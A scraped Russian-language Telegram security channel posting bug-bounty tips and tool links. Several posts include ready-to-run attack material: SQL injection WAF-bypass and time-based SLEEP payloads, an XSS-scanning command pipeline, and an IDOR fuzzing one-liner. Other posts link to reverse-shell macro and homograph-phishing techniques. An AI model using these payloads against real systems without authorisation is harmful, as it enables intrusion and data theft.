White Hat
11.8K subscribers
952 photos
51 videos
16 files
1.03K links
Пишем про информационную безопасность и белый хакинг.

Сотрудничество: @workhouse_price

Канал на бирже: https://telega.in/c/kind_hack

Канал в реестре РКН: https://clck.ru/3FtTnR
Download Telegram
🔎Скрипты и дорки для Netlas

Разработчики Netlas (аналог Shodan) представили статью, в которой рассказывают об автоматизации поиска хостов с помощью своей консольной утилиты. Скрипты из статьи доступны на GitHub.

Кроме того, нам любезно предоставили большую подборку дорков, ознакомиться с которой вы можете по данной ссылке.

💬 Ссылка на статью
💬 Ссылка на скрипты
💬 Ссылка на дорки

#Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4👏1
📌 Автоматизация JavaScript-разведки | Привет, друг. На связи Эллиот.

Основные этапы JavaScript-разведки в Bug Bounty это:

1 - Сбор файлов JS от цели.
2 - Поиск конечных точек из файлов JS.
3 - Поиск секретов в файлах JS.
4 - Получение файлов JS локально для ручного анализа.
7 - Извлечение имен переменных из файлов JS для проверки на XSS.
8 - Сканировать файлов JS на наличие DomXSS.

Для автоматизация вышеперечисленных и некоторых других действий есть неплохой инструмент, под названием JSFScan. Достаточно передать ему список поддоменов и задать опции в соответствии с вашими предпочтениями.

Ниже представлено видео, демонстрирующее процесс работы с данным инструментом.

Ссылка на GitHub
Ссылка на видео

#Web #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
🗄 Вариант поиска уязвимостей при пассивном анализе

Одним из шагов, которые я предпринимаю при исследовании нового домена, является получение целевых конечных точек и URL-адресов, выявленных третьими сторонами. Это можно сделать с помощью инструментов с открытым исходным кодом, таких как gau.

Инструмент getallurls (gau) извлекает известные URL-адреса из AlienVault's Open Threat Exchange, Wayback Machine и Common Crawl для любого заданного домена. Выполняем команду:

printf site.com | gau

После этого начинаем вручную анализировать конечные точки и URL-адреса, уделяя особое внимание некоторым чувствительным ключевым словам:

invoice, discount, promo-code, join, redirect, reset_password, reset-password, password, TrackOrder, token, invite.

В примере на фото ниже привлекает внимание слово invite. После нажатия по данной ссылке открывается страница регистрации. После создания новой учетной записи с личной электронной почтой (@gmail.com) сайт просто перенаправляет на страницу компании внутри целевого приложения, содержащую всех приглашенных сотрудников и конфиденциальную информацию.

#Web #Leak
👍3
📃 Механизмы закрепления в Windows системах

Репозиторий, представленный ниже, содержит информацию о механизмах закрепления в системах Windows. Большая часть из них хорошо известна в течение многих лет и активно используется в различных сценариях.

Репозиторий появился недавно и автор обещает активно пополнять его со временем.

💬 Ссылка на GitHub

#Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👏21👍1
📑 Пассивный сбор URL адресов и ответов сервера

Любой, кто занимается Bug Bounty, скорее всего, использовал waybackurls. Этот инструмент получает URL-адреса с web.archive.org и дополнительные ссылки (если таковые имеются) из index.commoncrawl.org. Вы, вероятно, также использовали gau, который находит URL-адреса из Wayback архива, Common Crawl, а также из Alien Vault и URLScan.

Инструмент под название waymore также получает URL-адреса из всех этих источников. Но самое главное различие между waymore и другими инструментами заключается в том, что он может загружать из архива ещё и ответы от сервера на эти URL-адреса из Wayback Machine, чтобы затем искать еще больше ссылок, комментариев разработчиков, дополнительных параметров и т.д.

Вы можете поближе познакомиться с инструментом на его GitHub странице. Можно также заглянуть в видео по ссылке, где показан пример его работы и использование другой утилиты от этого автора, под названием xnLinkFinder, для поиска URL адресов уже в собранных ответах сервера.

P.S.

Кстати, кроме xnLinkFinder можно ещё заюзать trufflehog для поиска секретов:

trufflehog filesystem --directory=/results/domain.com

#Recon
👍3🔥1
💉 Совет по обходу WAF для SQL-инъекций

Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.

https://example.com/getUser?name=' or "=' (403 Forbidden)

https://example.com/getUser?name=' or 1337.e(")=' (200 OK)

#Web #WAF #SQLi
👍132🤔1
🔎 Поиск по облачным «хранилищам»

Сегодня предлагаю вам рассмотреть сервис, который осуществляет поиск по таким хранилищам как: Mega, Depositefiles, Dropbox, Turbo Bit, Vip-files и пр. Возможен поиск по 60 наиболее популярным облачным хранилищам.

Ссылка на инструмент

Если вам необходимо осуществить поиск по менее популярным хранилищам, типа Take File, Anonfiles, Keep2share, Ex-load и пр., то предлагаю рассмотреть другой сервис, который осуществляет поиск по более чем 100 различным ресурсам.

Ссылка на инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51🔥1
Недавно выпустили плагин BurpSuite, который использует технологии искусственного интеллекта

Плагин генерирует имена для директорий, параметров и возможных файлов на основе запросов. Для генерации BruteForce листа используется OpenAI. Насколько это эффективно предстоит ещё проверить, но в целом — когда идей больше нет, можно обратиться к ней, чтобы получить "креатива".

На скрине показан пример как нейросеть может описать параметры, для отдельно взятого запроса и результат получается довольно достойным.

Ссылка на GitHub

#BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Практическая платформа для новичков Bug bounty

Бесплатный набор практических заданий от TheXSSRat, которые будут полезны новичкам и помогут вам проверить свои навыки в поиске и эксплуатации распространённых в Bug Bounty уязвимостей, таких как IDOR, XSS, CSRF и логические уязвимости.

Автор также обещает пополнения текущего списка заданий.

Ссылка на платформу

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Используем скрытый функционал в свойствах документов Microsoft Office для получения реверс шелла | Привет, друг. На связи Эллиот

Макросы из офисных документов Windows активно используются злоумышленниками или исследователями безопасности для доставки полезной нагрузки на сервер и компрометации системы.

В статье по ссылке представлен рабочий метод создания макроса для документов Word и Excel и его использование для вызова другого объекта, расположенного в свойствах документа. В видео ниже продемонстрировано получение реверс шелла с помощью этого метода.

Ссылка на чтиво
Ссылка на видеоматериал

#Word #Excel #Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
OpenSSF Scorecard

Тулза для автоматизации проверок безопасности проектов с открытым исходным кодом. Она помогает улучшить практики безопасности проектов и оценить, насколько безопасны их зависимости.

Scorecard оценивает важные критерии безопасности и присваивает каждому из них оценку от 0 до 10. Эти оценки можно использовать для улучшения безопасности проекта и принятия обоснованных решений о допустимости зависимостей.

Ссылка на GitHub

#Cybersecurity #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
🏃‍♂ Простое преобразование вывода в хэш для поиска IDOR

Иногда требуется конвертировать ввод в md5 / base64 / 32 и т.д непосредственно в консоле. Это бывает полезно, особенно когда вы ищите IDOR и конечная точка имеет значение в виде хэша, например:

https://targetdomain.com/user/3bf1114a986ba87ed28fc1b5884fc2f8

Для решения этой задачи, вы можете использовать простой bash-скрипт, совместно с ffuf.

Предположим, у вас есть конечная точка, которая принимает параметр id в виде md5. Мы можем проверить его на IDOR с помощью приведенной ниже команды, которая сгенерирует список чисел от 1 до 1000:

seq 1 1000 | hashit md5 | ffuf -w - -u https://targetdomain.com/user/FUZZ

#Web #IDOR #Bash
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51🤮1
🩸 Находим XSS (и не только) на сайте одной командой

Для этого нам потребуется предварительно установить несколько утилит на языке GO (ну и соответсвенно сам GO тоже должен быть установлен).

Первая - gospider, представляющая собой веб-краулер для быстрого сбора URL-адресов, связанных с сайтом.

Вторая - qsreplace. Она принимает на вход URL-адреса и заменяет все значения строки запроса на значение, указанное пользователем.

Третья - dalfox. Это производительный и быстрый инструмент для анализа параметров запроса и выявления различных типов XSS и других базовых уязвимостей.

После установки необходимо заменить строку https://example.com на адрес тестируемого сайта и выполнить команду:

gospider -s https://example.com -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe -o result.txt

#Web #XSS
👍72👏2👎1🔥1
Поиск Time-Based уязвимостей с httpx | Привет, друг. На связи Эллиот.

Когда нужно проверить список доменов на Time-Based уязвимости и лень писать шаблон для Nuclei, можно заюзать httpx с параметрами -timeout, для указания максимального таймаута и -mrt, для вывода только результатов с определенной задержкой.

cat web.list | httpx -silent -path '/sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10'

Аналогично, для заголовков:

cat web.list | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(10),0))OR" -rt -timeout 20 -mrt '>10'

#Web #SQLi #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
🤛 Омографическая атака для фишинга

Эти атаки известны уже почти 20 лет, в их основе лежит принцип использования в доменных именах символов нелатинских алфавитов, внешне неотличимых от латинских букв.

В результате доменное имя выглядит как tᴡitter.com или clᴏudflare.com, однако переход по нему ведет на фальшивую страницу созданную для похищения логинов и паролей.

Для поиска доступных доменов, можно использовать Ditto - это небольшой инструмент, который принимает доменное имя в качестве входных данных и генерирует все его варианты для омографической атаки.

На выходе получаем список доменов, с отображением какие из них доступны, а какие уже зарегистрированы.

Ссылка на GitHub

#Web #Phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81💩1
Circadian - фоновый демон GNU/Linux

Инструмент для автоматического запуска приостановки/сна/гибернации GNU/Linux

Circadian использует набор «эвристик простоя», чтобы определить, когда система простаивает.

К ним относятся:
▫️ Действия пользователя в X11 (клавиатура, мышь, полноэкранное воспроизведение)
▫️ Действия пользователя в терминалах (ввод в сеансе PTY/SSH)
▫️ Открытые SSH-соединения
▫️ Открытые соединения SMB/Samba
▫️ Открытые соединения NFS
▫️ Активное воспроизведение звука
▫️ Использование ЦП ниже указанного порога
▫️ Процессы из черного списка

Когда все его эвристики определят, что ваша система бездействовала достаточно долго, Circadian выполнит команду. Обычно это простая приостановка питания, но ее можно настроить на любое желаемое действие.

☝🏻Circadian также может запланировать автоматическое ежедневное пробуждение.

Просто установите время пробуждения в его файле конфигурации, и он будет просыпаться один раз в день в это время (если он еще не проснулся). Это позволяет легко обновлять и создавать резервные копии машины, даже если она редко используется.

📶 Он также может выполнить команду, когда обнаружит, что система вышла из спящего режима, независимо от того, почему она проснулась.

Ссылка на GitHub

#Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
👍101
Бот для отслеживания новых уязвимостей

Используйте этого бота для мониторинга новых CVE, содержащих определенные ключевые слова, и отправки оповещений в Slack и/или Telegram.

Можно быстро отслеживать появление новых XSS, RCE и тд, писать кастомные шаблоны для Nuclei и прогонять их по своему списку хостов.

Ссылка на GitHub

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
📑 Инструмент поиска XSS в AngularJS

Инструмент SSTI-XSS-Finder позволяет собирать из Shodan поддомены, которые используют технологию AngularJS, и предоставляет нам полезную нагрузку XSS, связанную с AngularJS-версией этого поддомена.

./SSTI-XSS-Finder.sh <Shodan-Dork>

Примеры дорков:

org:target
hostname:target.com
net:127.0.0.1

Ссылка на GitHub

#Web #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2💩1
🏃‍♂ Инструмент: CRIU

Проект по реализации функций проверки/восстановления для GNU/Linux.

Используя этот инструмент, вы можете заморозить работающее приложение (или его часть) и сохранить его на жестком диске в виде набора файлов. Затем вы можете использовать файлы для восстановления и запуска приложения с того места, где оно было заморожено.

Отличительной особенностью проекта CRIU является то, что он преимущественно реализуется в пользовательском пространстве.

Ссылка на GitHub
Ссылка на оф. сайт

#Linux #restore
Please open Telegram to view this post
VIEW IN TELEGRAM
👍41💩1
📶 Мощный сканер веб-приложений, объединяющий широкий набор инструментов

reconFTW - это инструмент, предназначенный для выполнения автоматизированного сбора информации о целевом домене, путем запуска наилучшего набора инструментов для выполнения сканирования и выявления уязвимостей.

Он объединяет в себе множество популярных инструментов, которые мы уже рассматривали на канале. Подробнее о работе данного инструменты вы можете узнать на GitHub, но будьте уверены, инструмент заслуживает вашего внимания. Ниже представлена схема его работы.

Ссылка на GitHub

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9💩1🍓1
🔎 Автоматический поиск SSRF уязвимостей

Для поиска SSRF на сайте можно воспользоваться инструментом под названием SSRFire. Просто укажите доменное имя сайта, адрес своего сервера (или Burp Collaborator) и ждите результатов.

Также есть опции для поиска XSS и Open Redirect. Для работы инструмента требуются установленные Python 3.7+ и GO.

Ссылка на GitHub

#Web #XSS #SSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍43💩1